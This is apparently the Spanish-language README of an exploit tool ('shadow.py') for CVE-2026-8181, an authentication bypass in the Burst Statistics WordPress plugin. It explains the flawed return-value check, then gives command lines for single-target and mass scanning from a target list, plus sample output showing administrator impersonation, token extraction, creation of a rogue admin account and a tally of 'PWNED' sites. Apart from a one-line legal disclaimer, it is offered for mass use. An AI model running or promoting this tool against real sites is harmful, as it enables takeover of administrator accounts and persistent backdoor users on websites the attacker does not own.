
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Omisión de Autenticación para la Toma de Control de una Cuenta de Administrador
Burst Statistics | Omisión de autenticación para apropiación de cuenta de administrador
Burst Statistics 3.4.0 - 3.4.1.1 - Omisión de autenticación para apropiación de cuenta de administrador
El plugin Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) para WordPress es vulnerable a la omisión de autenticación en las versiones 3.4.0 a 3.4.1.1. Esto se debe a un manejo incorrecto del valor de retorno en la función is_mainwp_authenticated() al validar las contraseñas de aplicación provenientes de la cabecera Authorization. La función llama a wp_authenticate_application_password(null, $username, $password), la cual devuelve null (no WP_Error) cuando el usuario objetivo no tiene contraseñas de aplicación configuradas. Dado que el código solo comprueba is_wp_error(), continúa llamando a wp_set_current_user(), otorgando privilegios completos de administrador al atacante durante toda la petición.
La omisión se activa durante plugins_loaded (prioridad 9) mediante has_admin_access() en el arranque del plugin, lo que significa que la suplantación del usuario ocurre antes de que la API REST de WordPress despache cualquier ruta, permitiendo el acceso a todos los endpoints del núcleo de WP (/wp/v2/users, /wp/v2/users/me, etc.) como administrador.
Esto permite que atacantes no autenticados, conociendo un nombre de usuario administrador, se hagan pasar por ese administrador proporcionando cualquier contraseña aleatoria de autenticación básica, logrando una escalada completa de privilegios y la apropiación de la cuenta de administrador.
~ Puntuación CVSS: 9.8 (Crítico)
~ Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Versiones afectadas: 3.4.0 - 3.4.1.1
~ Versión parcheada: 3.4.2
Objetivo único :
python3 shadow.py -u https://target.comObjetivo único con nombre de usuario conocido :
python3 shadow.py -u https://target.com -U adminObjetivos masivos :
python3 shadow.py -f targets.txt -t 20Modo interactivo :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
El uso no autorizado de sistemas que no posees o para los que no tienes permiso de prueba es ilegal.